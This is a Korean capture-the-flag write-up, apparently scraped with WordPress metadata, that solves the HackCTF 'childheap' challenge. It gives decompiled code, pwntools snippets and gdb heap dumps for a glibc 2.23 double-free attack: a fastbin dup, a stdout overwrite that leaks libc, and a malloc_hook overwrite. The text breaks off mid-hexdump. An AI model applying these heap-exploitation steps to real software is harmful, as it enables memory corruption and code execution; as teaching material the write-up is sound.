https:\/\/github.com\/koharin\/pwnable2\/tree\/main\/hackCTF\/pwnable\/childheap<\/a><\/p>\n\n\n\n \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ud0a4\uba74,<\/p>\n\n\n\n \ub531 2\uac00\uc9c0 \uba54\ub274\ubc16\uc5d0 \uc874\uc7ac\ud558\uc9c0 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n \uc778\ub371\uc2a4 0~3\uac1c\uae4c\uc9c0, \ud06c\uae30\ub294 0x80\ubcf4\ub2e4 \ud06c\uba74 \uc548\ub41c\ub2e4\ub294 \uc870\uac74\ud558\uc5d0 \ud560\ub2f9\uc2dc\ud0a8 \ud06c\uae30\ub9cc\ud07c content \ub370\uc774\ud130 \ub610\ud55c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n \uc778\ub371\uc2a4 0~3\uac1c \uc911 \ud560\ub2f9\ub41c \ud558\ub098\uc758 \uc2ac\ub86f \uc8fc\uc18c\ub97c Free\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n \ucd94\ud6c4 unsorted bin \ubcd1\ud569\uc744 \ub9c9\uae30 \uc704\ud574 fastbin 0x60 \ud06c\uae30\uc758 heap\uc744 \uba3c\uc800 \uc0dd\uc131\ud55c\ub2e4.<\/p>\n\n\n\n \uc774\ud6c4\uc5d0 unsorted bin \ud06c\uae30\ub97c \ud558\ub098 \ub9cc\ub4e4\uae30 \uc704\ud574 0x80 \ud06c\uae30\uc758 heap \uc0dd\uc131.<\/p>\n\n\n\n \ubcd1\ud569\uc744 \ub9c9\uae30 \uc704\ud574 \ud55c\ubc88\ub354 fastbin 0x60 \ud06c\uae30\uc758 heap\uc744 \uc0dd\uc131\ud55c\ub2e4.<\/p>\n\n\n\n \uc774\uc81c 1\ubc88\uc9f8 \uc778\ub371\uc2a4\uc758 \ud799\uc744 free \uc2dc\ud0a4\uba74, unsorted bin\uc744 \ub9cc\ub4e4\uc5b4\uc904 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n unsorted bin \ud558\ub098\uac00 \ub9cc\ub4e4\uc5b4\uc84c\uace0, (0x45f6070) \uc774\uc804\uc5d0 fd, bk\uc5d0 main_arena+88 \uc8fc\uc18c\ub97c \uc5b8\uae09\ud588\ub358 \uccad\ud06c\uc5d0\ub2e4\uac00 \uc5ec\uae30\uc11c\ub294 85dd\ub85c \ub36e\uc5c8\ub2e4.<\/p>\n\n\n\n 35dd\ub85c \ub36e\ub294 \uc774\uc720\ub294 \ucd94\ud6c4 \uccad\ud06c\uc5d0\uc11c \ud560\ub2f9\ubc1b\ub294 \uc8fc\uc18c\ub97c \uadf8 \uc9c0\uc810\uc73c\ub85c \ud574\ub450\uae30 \uc704\ud574\uc11c\ub2e4.<\/p>\n\n\n\n \ubcf4\ub2e4\uc2dc\ud53c main_arena+88\uacfc offset \ucc28\uc774\uac00 \uc5bc\ub9c8\ub098\uc9c0 \uc54a\ub294\ub2e4.<\/p>\n\n\n\n \uc544\ub798 \ub514\ubc84\uae45 \ud654\uba74\uc740 85dd\ub85c \ub36e\uae30 \ubc14\ub85c \uc9c1\uc804\uc758 \uc7a5\uba74\uc774\ub2e4.<\/p>\n\n\n\n 35dd\ub294 \uc5b4\ub290 \uc9c0\uc810\uc744 \uac00\ub9ac\ud0a4\uace0 \uc788\uc744\uae4c \uad81\uae08\ud574\uc11c \ub2e4\uc74c\uc73c\ub85c, fastbin dup\uc744 \ud2b8\ub9ac\uac70\ud55c\ub2e4.<\/p>\n\n\n\n 0x60\ud06c\uae30\ub85c \ud799\uc744 \ud560\ub2f9\ud558\uace0<\/p>\n\n\n\n fastbin dup\uc744 \ud2b8\ub9ac\uac70\ud55c\ub2e4.<\/p>\n\n\n\n \uadf8\ub7ec\uba74 0x70 \ud06c\uae30\ub97c \uad00\ub9ac\ud558\ub294 fastbin \uccad\ud06c\uc5d0 overlap\uc774 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n \ub2e4\uc74c\ubc88\uc5d0 0x60\ud06c\uae30\ub85c \ud799 \ud560\ub2f9\ud560\ub54c 0x1277170 \uccad\ud06c\ub85c \ud560\ub2f9\ubc1b\uc744 \uac83\uc774\ub2e4.<\/p>\n\n\n\n 0x60 \ud06c\uae30\ub85c \ud799\uc744 \ud560\ub2f9\ud558\uace0, stdout fake chunk\uc5d0 0x70\uac12\uc744 \uc801\uc5b4\uc8fc\uc5c8\ub2e4.<\/p>\n\n\n\n \uadf8\ub7ec\uba74 \uc989 0x60\ud06c\uae30\ub85c \ud799 \ud560\ub2f9\uc744 4\ubc88\uc9f8\ub85c \ud560\ub2f9\ubc1b\ub294 \uc2dc\uc810\uc5d0\ub294 0x7f94d4f285dd \uccad\ud06c\ub85c \ud560\ub2f9\ubc1b\uac8c \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n 0x60 \ud06c\uae30\ub85c \ud799\uc744 3\ubc88 \uc815\ub3c4 \ud560\ub2f9\ud558\uace0\ub098\uba74, \ud560\ub2f9\ubc1b\uace0\ub098\uc11c \ubcc0\uc870\ud560 \uc218 \uc788\ub294 \ubd80\ubd84\uc740 _IO_2_1_stderr+157+16\uc774\ub2e4.<\/p>\n\n\n\n \ube0c\ub8e8\ud2b8\ud3ec\uc2f1\uc73c\ub85c 1\/16 \ud655\ub960\ub85c \ubcc0\uc870\ud560 \uc218 \uc788\uac8c \ub9cc\ub4e0\ub2e4.<\/p>\n\n\n\n \ud574\ub2f9 \uc9c0\uc810\uc740 stderr \uad6c\uc870\uccb4 \ubc14\ub85c \ub4a4\uc5d0\ub294 stdout \uad6c\uc870\uccb4\uac00 \uc874\uc7ac\ud55c\ub2e4. \uc6b0\ub9ac\uac00 \ub36e\uc73c\ub824\ub294 \uc9c0\uc810\uc774 \ubc14\ub85c \uadf8\uacf3\uc774\ub2e4.<\/p>\n\n\n\n libc base \uc8fc\uc18c\ub97c \uad6c\ud558\uae30 \uc704\ud574 stdout \uad6c\uc870\uccb4\uc758 \ud544\ub4dc\uc5d0 \ub36e\uc5b4\uc9c0\ub294 \uac12\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n \uc5ec\uae30\uae4c\uc9c0 \uc798 \uc9c4\ud589\ud588\ub2e4\uba74, _IO_2_1_stdin \uc8fc\uc18c\uac00 leak\ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n leak\ub41c \uc8fc\uc18c\uc5d0\uc11c \uc624\ud504\uc14b \uacc4\uc0b0\ud558\uc5ec libc base \uc8fc\uc18c\ub97c \uad6c\ud574\uc8fc\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n \ud604\uc7ac \ud799 \uc0c1\ud0dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n \ub2e4\uc2dc\ud55c\ubc88 fastbin dup\uc744 \ud2b8\ub9ac\uac70\ud574\uc11c AAW\ud558\uae30 \uc704\ud574 fastbindup\uc744 \ud2b8\ub9ac\uac70\ud55c\ub2e4.<\/p>\n\n\n\n \ud2b8\ub9ac\uac70\ud558\uba74, \ub9c8\ucc2c\uac00\uc9c0\ub85c overlap \ubc1c\uc0dd.<\/p>\n\n\n\n 4\ubc88\uc9f8\uc5d0 \ud560\ub2f9\ubc1b\uc744 \uc8fc\uc18c\ub294 malloc_hook – 35\uc9c0\uc810\uc73c\ub85c \ud55c\ub2e4.<\/p>\n\n\n\n \uadf8\ub7fc (0x70) fastbin[5]\uc744 \uc0b4\ud3b4\ubd24\uc744\ub54c 4\ubc88\uc9f8 \ud560\ub2f9\ubd80\ud130 0x7f4839f37aed \uccad\ud06c\ub97c \uac00\ub9ac\ud0a4\uace0, malloc_hook – 35\uc9c0\uc810\uc73c\ub85c \ud55c \uc774\uc720\ub294 0x7f\ub77c\ub294 chunk size\uac00 \uc720\ud6a8\ud558\uae30 \ub54c\ubb38.<\/p>\n\n\n\n 3\ubc88\uc9f8 malloc\ubd80\ud130 malloc_hook – 35\uc9c0\uc810\uc778 0x7f17df3e7aed\uc8fc\uc18c\uc758 \uccad\ud06c\ub97c \ud560\ub2f9\ubc1b\uae30\uc5d0 \uc774\ud6c4 \ub2e4\uc74c malloc \ud638\ucd9c \uc2dc \uc258\uc744 \uc5bb\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n Source https:\/\/github.com\/koharin\/pwnable2\/tree\/main\/hackCTF\/pwnable\/childheap \ud658\uacbd checksec Decompiled-src \/ Analysis main \ud504\ub85c\uadf8\ub7a8\uc744 \uc2e4\ud589\uc2dc\ud0a4\uba74, \ub531 2\uac00\uc9c0 \uba54\ub274\ubc16\uc5d0 \uc874\uc7ac\ud558\uc9c0 \uc54a\ub294\ub2e4. 1. Malloc \uc778\ub371\uc2a4 0~3\uac1c\uae4c\uc9c0, \ud06c\uae30\ub294 0x80\ubcf4\ub2e4 \ud06c\uba74 \uc548\ub41c\ub2e4\ub294 \uc870\uac74\ud558\uc5d0\uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\uc2dc\ud0a8 \uc2ac\ub86f\uc744 \uc800\uc7a5\ud560 \uc218 \uc788\ub2e4. \ud560\ub2f9\uc2dc\ud0a8… \ub354 \ubcf4\uae30 »[HackCTF] childheap (\ud799\ub0b4\uc6a9 \ucd9c\ub825\uc5c6\ub294 malloc\/free \uae30\ub2a5\ub9cc \uc788\ub294 \ucf00\uc774\uc2a4)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[19],"tags":[54,73,35,25],"class_list":["post-3756","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fastbin_dup","tag-glibc_2-23","tag-heap","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3756","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3756"}],"version-history":[{"count":3,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions"}],"predecessor-version":[{"id":3761,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3756\/revisions\/3761"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3756"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3756"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3756"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\ud658\uacbd<\/h3>\n\n\n\n
\n
checksec<\/h3>\n\n\n\n
checksec .\/childheap \n[*] '\/home\/ubuntu\/study\/childheap\/childheap'\n Arch: amd64-64-little\n RELRO: Partial RELRO\n Stack: Canary found\n NX: NX enabled\n PIE: No PIE (0x400000)\n Stripped: No<\/pre>\n\n\n\n
Decompiled-src \/ Analysis<\/h3>\n\n\n\n
main<\/h3>\n\n\n\n
\n
int menu()\n{\n puts(\"1. malloc\");\n puts(\"2. free\");\n return printf(\"> \");\n}\n\nint __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n int v3; \/\/ [rsp+Ch] [rbp-4h]\n\n Init(argc, argv, envp);\n while ( 1 )\n {\n while ( 1 )\n {\n menu();\n v3 = input_number();\n if ( v3 != 1 )\n break;\n Malloc();\n }\n if ( v3 != 2 )\n exit(0);\n Free();\n }\n}<\/pre>\n\n\n\n1. Malloc<\/h3>\n\n\n\n
\uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\uc2dc\ud0a8 \uc2ac\ub86f\uc744 \uc800\uc7a5\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\nunsigned __int64 Malloc()\n{\n signed int v0; \/\/ ebx\n signed int v2; \/\/ [rsp+0h] [rbp-20h] BYREF\n signed int v3; \/\/ [rsp+4h] [rbp-1Ch] BYREF\n unsigned __int64 v4; \/\/ [rsp+8h] [rbp-18h]\n\n v4 = __readfsqword(0x28u);\n printf(\"index: \");\n __isoc99_scanf(\"%d\", &v2);\n if ( (unsigned int)v2 > 4 )\n exit(1);\n printf(\"size: \");\n __isoc99_scanf(\"%d\", &v3);\n if ( (unsigned int)v3 > 0x80 )\n exit(1);\n v0 = v2;\n *(&ptr + v0) = malloc(v3);\n if ( !*(&ptr + v2) )\n exit(1);\n printf(\"content: \");\n read(0, *(&ptr + v2), v3);\n return __readfsqword(0x28u) ^ v4;\n}<\/pre>\n\n\n\n2. Free<\/h3>\n\n\n\n
unsigned __int64 Free()\n{\n unsigned int v1; \/\/ [rsp+4h] [rbp-Ch] BYREF\n unsigned __int64 v2; \/\/ [rsp+8h] [rbp-8h]\n\n v2 = __readfsqword(0x28u);\n printf(\"index: \");\n __isoc99_scanf(\"%d\", &v1);\n if ( v1 > 4 )\n exit(1);\n free(*(&ptr + (int)v1));\n return __readfsqword(0x28u) ^ v2;\n}<\/pre>\n\n\n\nSolution<\/h3>\n\n\n\n
1. unsorted bin \ud558\ub098 \ub9cc\ub4e4\uae30<\/h3>\n\n\n\n
# \ucd94\ud6c4 unsorted bin \ubcd1\ud569\uc744 \ub9c9\uae30 \uc704\ud574 fastbin \ud06c\uae30\uc758 heap\uc744 \uba3c\uc800 \uc0dd\uc131\ud55c\ub2e4. \nmalloc(0, 0x60, b'A'*8)<\/pre>\n\n\n\n
# unsorted bin \ud06c\uae30\uc778 0x80 \ud06c\uae30\uc758 heap \uc0dd\uc131.\nmalloc(1, 0x80, b'B'*8)<\/pre>\n\n\n\n
# \ubcd1\ud569\uc744 \ub9c9\uae30 \uc704\ud574 \ud55c\ubc88\ub354 fastbin 0x60 \ud06c\uae30\uc758 heap\uc744 \uc0dd\uc131\ud55c\ub2e4.\nmalloc(2, 0x60, b'A'*8)<\/pre>\n\n\n\n
free(1)<\/pre>\n\n\n\n
\ud2b9\uc131\uc0c1 fd, bk\uc5d0 main_arena+88 \uc8fc\uc18c\uac00 \uc801\ud600\uc788\ub2e4.<\/p>\n\n\n\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x45f6170 (size : 0x20e90) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x45f6070 (size : 0x90)\n \ngdb-peda$ parseheap\naddr prev size status fd bk \n0x45f6000 0x0 0x70 Used None None\n0x45f6070 0x0 0x90 Freed 0x7ff5a93e4b78 0x7ff5a93e4b78\n0x45f6100 0x90 0x70 Used None None\n\ngdb-peda$ x\/8gx 0x45f6070\n0x45f6070:\t0x0000000000000000\t0x0000000000000091\n0x45f6080:\t0x00007ff5a93e4b78\t0x00007ff5a93e4b78\n0x45f6090:\t0x0000000000000000\t0x0000000000000000\n0x45f60a0:\t0x0000000000000000\t0x0000000000000000\n\ngdb-peda$ x\/gx 0x00007ff5a93e4b78\n0x7ff5a93e4b78 <main_arena+88>:\t0x00000000045f6170<\/pre>\n\n\n\n
2. 1\/16 \ud655\ub960\ub85c stdout \uc9c0\uc810\uc744 overwrite \ud558\uae30<\/h3>\n\n\n\n
fd\uc5d0 ?5dd\ub85c \ub36e\ub294\ub2e4. \uc5ec\uae30\uc11c \uc784\uc2dc\ub85c ?\ub294 0~f\uae4c\uc9c0 1\/16 \ud655\ub960\uc758 \uac20\ub610\ub85c
_IO_2_1_stderr+157 \uc8fc\uc18c\ub85c \ub54c\ub824\ub9de\ucd9c \uc218 \uc788\ub2e4.<\/p>\n\n\n\nmalloc(1, 0x60, p16(0x85dd)) #0x7f39b9fc85dd <_IO_2_1_stderr_+157><\/pre>\n\n\n\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x1b620170 (size : 0x20e90) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x1b620070 (size : 0x90)\ngdb-peda$ parseheap\naddr prev size status fd bk \n0x1b620000 0x0 0x70 Used None None\n0x1b620070 0x0 0x90 Freed 0x7f39b9fc7b78 0x7f39b9fc7b78\n0x1b620100 0x90 0x70 Used None None\ngdb-peda$ x\/16gx 0x1b620070\n0x1b620070:\t0x0000000000000000\t0x0000000000000091\n0x1b620080:\t0x00007f39b9fc7b78\t0x00007f39b9fc7b78\n\ngdb-peda$ p stdout\n$2 = (struct _IO_FILE *) 0x7f39b9fc8620 <_IO_2_1_stdout_>\n\ngdb-peda$ x\/16gx 0x7f39b9fc8620-0x43\n0x7f39b9fc85dd <_IO_2_1_stderr_+157>:\t0x39b9fc7660000000\t0x000000000000007f\n0x7f39b9fc85ed <_IO_2_1_stderr_+173>:\t0x0000000000000000\t0x0000000000000000\n0x7f39b9fc85fd <_IO_2_1_stderr_+189>:\t0x0000000000000000\t0x0000000000000000\n0x7f39b9fc860d <_IO_2_1_stderr_+205>:\t0x0000000000000000\t0x39b9fc66e0000000\n0x7f39b9fc861d <_IO_2_1_stderr_+221>:\t0x00fbad288700007f\t0x39b9fc86a3000000\n0x7f39b9fc862d <_IO_2_1_stdout_+13>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n0x7f39b9fc863d <_IO_2_1_stdout_+29>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\n0x7f39b9fc864d <_IO_2_1_stdout_+45>:\t0x39b9fc86a300007f\t0x39b9fc86a300007f\ngdb-peda$ info address _IO_2_1_stderr_\nSymbol \"_IO_2_1_stderr_\" is static storage at address 0x7f39b9fc8540.\ngdb-peda$ p\/x 0x7f39b9fc8540+157\n$6 = 0x7f39b9fc85dd<\/pre>\n\n\n\n
\uc784\uc2dc\ub85c 0x4142434445464748 \uac12\uc744 \ub36e\uc5b4\uc368\uc11c \ud655\uc778\ud574\ubd24\ub294\ub370struct _IO_FILE_plus *<\/code> \uad6c\uc870\uccb4\uc758 _codecvt<\/code> \ud544\ub4dc \uc704\uce58\uc758 \ud558\uc704 3\ubc14\uc774\ud2b8\ucabd\ubd80\ud130 \ub36e\uc5b4\uc368\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\ngdb-peda$ set {unsigned long long}0x7f39b9fc85dd = 0x4142434445464748\n\ngdb-peda$ p *(struct _IO_FILE_plus *)0x7f39b9fc8540\n$10 = {\n file = {\n _flags = 0xfbad2086, \n _IO_read_ptr = 0x0, \n _IO_read_end = 0x0, \n _IO_read_base = 0x0, \n _IO_write_base = 0x0, \n _IO_write_ptr = 0x0, \n _IO_write_end = 0x0, \n _IO_buf_base = 0x0, \n _IO_buf_end = 0x0, \n _IO_save_base = 0x0, \n _IO_backup_base = 0x0, \n _IO_save_end = 0x0, \n _markers = 0x0, \n _chain = 0x7f39b9fc8620 <_IO_2_1_stdout_>, \n _fileno = 0x2, \n _flags2 = 0x0, \n _old_offset = 0xffffffffffffffff, \n _cur_column = 0x0, \n _vtable_offset = 0x0, \n _shortbuf = \"\", \n _lock = 0x7f39b9fc9770 <_IO_stdfile_2_lock>, \n _offset = 0xffffffffffffffff, \n _codecvt = 0x4647480000000000, \n _wide_data = 0x7f4142434445, \n _freeres_list = 0x0, \n _freeres_buf = 0x0, \n __pad5 = 0x0, \n _mode = 0x0, \n _unused2 = '\\000' <repeats 19 times>\n }, \n vtable = 0x7f39b9fc66e0 <_IO_file_jumps>\n}<\/pre>\n\n\n\nmalloc(3, 0x60, b'C'*8)<\/pre>\n\n\n\n
free(3)\nfree(0)\nfree(3)<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x1277000 0x0 0x70 Freed 0x1277170 None\n0x1277070 0x0 0x70 Used None None\n0x12770e0 0x0 0x20 Freed 0x7f94d4f26b88 0x7f94d4f26b88\n0x1277100 0x20 0x70 Used None None\n0x1277170 0x0 0x70 Freed 0x1277000 None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x1277170 --> 0x1277000 --> 0x1277170 (overlap chunk with 0x1277170(freed) )\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x12771e0 (size : 0x20e20) \n last_remainder: 0x12770e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x12770e0<\/pre>\n\n\n\n
malloc(0, 0x60, p8(0x70))<\/pre>\n\n\n\n
(0x70) fastbin[5]<\/code> \ub9ac\uc2a4\ud2b8\ub97c \uc0b4\ud3b4\ubd24\uc744\ub54c
4\ubc88\uc9f8\ubd80\ud130 0x7f94d4f285dd, \uc989 IO_2_1_stderr<\/em>+157 \uc9c0\uc810\uc744 \uac00\ub9ac\ud0a4\uace0 \uc788\ub2e4.<\/p>\n\n\n\ngdb-peda$ parseheap\naddr prev size status fd bk \n0x1277000 0x0 0x70 Freed 0x1277170 None\n0x1277070 0x0 0x70 Freed 0x7f94d4f285dd None\n0x12770e0 0x0 0x20 Freed 0x7f94d4f26b88 0x7f94d4f26b88\n0x1277100 0x20 0x70 Used None None\n0x1277170 0x0 0x70 Freed 0x1277070 None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x1277000 --> 0x1277170 --> 0x1277070 --> 0x7f94d4f285dd (size error (0x0)) --> 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x12771e0 (size : 0x20e20) \n last_remainder: 0x12770e0 (size : 0x20) \n unsortbin: 0x0\n(0x020) smallbin[ 0]: 0x12770e0\ngdb-peda$ <\/pre>\n\n\n\n
\uc774\uc81c\ubd80\ud130 IO_2_1_stderr<\/em>+157 \uccad\ud06c\ub85c \ud560\ub2f9\ubc1b\uc744 \uc218 \uc788\ub2e4.<\/p>\n\n\n\nwhile True:\n p = process(\".\/childheap\")\n\t # ...\n \n malloc(1, 0x60, b'D'*8)\n malloc(2, 0x60, b'D'*8)\n malloc(3, 0x60, b'D'*8)\n\n # stdout\uc744 \ub36e\uae30\n payload = b'A'*51 + p64(0xfbad1800) + p64(0)*3 + p8(0)\n\n try:\n malloc(4, 0x60, payload)\n pause()\n except:\n p.close()\n continue<\/pre>\n\n\n\n
stderr<\/code> \uad6c\uc870\uccb4\uc758 _freeres_list<\/code> \ud544\ub4dc \uc911 \ud558\uc704 3\ubc14\uc774\ud2b8\ubd80\ud130 \ub36e\uc5b4\uc368\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\ngdb-peda$ p *(struct _IO_FILE_plus *)0x7f3c26cf8540\n$2 = {\n file = {\n _flags = 0xfbad2086, \n _IO_read_ptr = 0x0, \n _IO_read_end = 0x0, \n _IO_read_base = 0x0, \n _IO_write_base = 0x0, \n _IO_write_ptr = 0x0, \n _IO_write_end = 0x0, \n _IO_buf_base = 0x0, \n _IO_buf_end = 0x0, \n _IO_save_base = 0x0, \n _IO_backup_base = 0x0, \n _IO_save_end = 0x0, \n _markers = 0x0, \n _chain = 0x7f3c26cf8620 <_IO_2_1_stdout_>, \n _fileno = 0x2, \n _flags2 = 0x0, \n _old_offset = 0xffffffffffffffff, \n _cur_column = 0x0, \n _vtable_offset = 0x0, \n _shortbuf = \"\", \n _lock = 0x7f3c26cf9770 <_IO_stdfile_2_lock>, \n _offset = 0xffffffffffffffff, \n _codecvt = 0x0, \n _wide_data = 0x7f3c26cf7660 <_IO_wide_data_2>, \n _freeres_list = 0x4141410000000000, \n _freeres_buf = 0x4141414141414141, \n __pad5 = 0x4141414141414141, \n _mode = 0x41414141, \n _unused2 = 'A' <repeats 20 times>\n }, \n vtable = 0x4141414141414141\n}<\/pre>\n\n\n\n_flags = 0xfad1800
_IO_read_ptr = 0
_IO_read_end = 0
_IO_read_base = 0 _IO_write_base = 0x????????\u2026.00<\/code><\/p>\n\n\n\npayload = b'A'*51 + p64(0xfbad1800) + p64(0)*3 + p8(0)<\/pre>\n\n\n\n
gdb-peda$ p stdout\n$4 = (struct _IO_FILE *) 0x7f3c26cf8620 <_IO_2_1_stdout_>\n\ngdb-peda$ x\/16gx 0x7f3c26cf85f0\n0x7f3c26cf85f0 <_IO_2_1_stderr_+176>:\t0x4141414141414141\t0x4141414141414141\n0x7f3c26cf8600 <_IO_2_1_stderr_+192>:\t0x4141414141414141\t0x4141414141414141\n0x7f3c26cf8610 <_IO_2_1_stderr_+208>:\t0x4141414141414141\t0x4141414141414141\n0x7f3c26cf8620 <_IO_2_1_stdout_>:\t0x00000000fbad1800\t0x00007f3c26cf86a3\n0x7f3c26cf8630 <_IO_2_1_stdout_+16>:\t0x00007f3c26cf86a3\t0x00007f3c26cf86a3\n0x7f3c26cf8640 <_IO_2_1_stdout_+32>:\t0x00007f3c26cf86a3\t0x00007f3c26cf86a3\n0x7f3c26cf8650 <_IO_2_1_stdout_+48>:\t0x00007f3c26cf86a4\t0x00007f3c26cf86a3\n0x7f3c26cf8660 <_IO_2_1_stdout_+64>:\t0x00007f3c26cf86a4\t0x0000000000000000\n\ngdb-peda$ p *(struct _IO_FILE_plus *)0x7f3c26cf8620\n$5 = {\n file = {\n _flags = 0xfbad1800, \n _IO_read_ptr = 0x7f3c26cf86a3 <_IO_2_1_stdout_+131> \"\\n\", \n _IO_read_end = 0x7f3c26cf86a3 <_IO_2_1_stdout_+131> \"\\n\", \n _IO_read_base = 0x7f3c26cf86a3 <_IO_2_1_stdout_+131> \"\\n\", \n _IO_write_base = 0x7f3c26cf86a3 <_IO_2_1_stdout_+131> \"\\n\", \n _IO_write_ptr = 0x7f3c26cf86a3 <_IO_2_1_stdout_+131> \"\\n\", \n _IO_write_end = 0x7f3c26cf86a4 <_IO_2_1_stdout_+132> \"\", \n _IO_buf_base = 0x7f3c26cf86a3 <_IO_2_1_stdout_+131> \"\\n\", \n _IO_buf_end = 0x7f3c26cf86a4 <_IO_2_1_stdout_+132> \"\", \n _IO_save_base = 0x0, \n _IO_backup_base = 0x0, \n _IO_save_end = 0x0, \n _markers = 0x0, \n _chain = 0x7f3c26cf78e0 <_IO_2_1_stdin_>, \n _fileno = 0x1, \n _flags2 = 0x0, \n _old_offset = 0xffffffffffffffff, \n _cur_column = 0x0, \n _vtable_offset = 0x0, \n _shortbuf = \"\\n\", \n _lock = 0x7f3c26cf9780 <_IO_stdfile_1_lock>, \n _offset = 0xffffffffffffffff, \n _codecvt = 0x0, \n _wide_data = 0x7f3c26cf77a0 <_IO_wide_data_1>, \n _freeres_list = 0x0, \n _freeres_buf = 0x0, \n __pad5 = 0x0, \n _mode = 0xffffffff, \n _unused2 = '\\000' <repeats 19 times>\n }, \n vtable = 0x7f3c26cf66e0 <_IO_file_jumps>\n}<\/pre>\n\n\n\n3. leak\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c \uad6c\ud558\uae30<\/h3>\n\n\n\n
DEBUG] Received 0xb7 bytes:\n 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 \u2502AAAA\u2502AAAA\u2502AAAA\u2502AAAA\u2502\n *\n 00000020 00 18 ad fb 00 00 00 00 00 00 00 00 00 00 00 00 \u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u00b7\u2502\n 00000040 00 86 17 5e 8b 7f 00 00 a3 86 17 5e 8b 7f 00 00 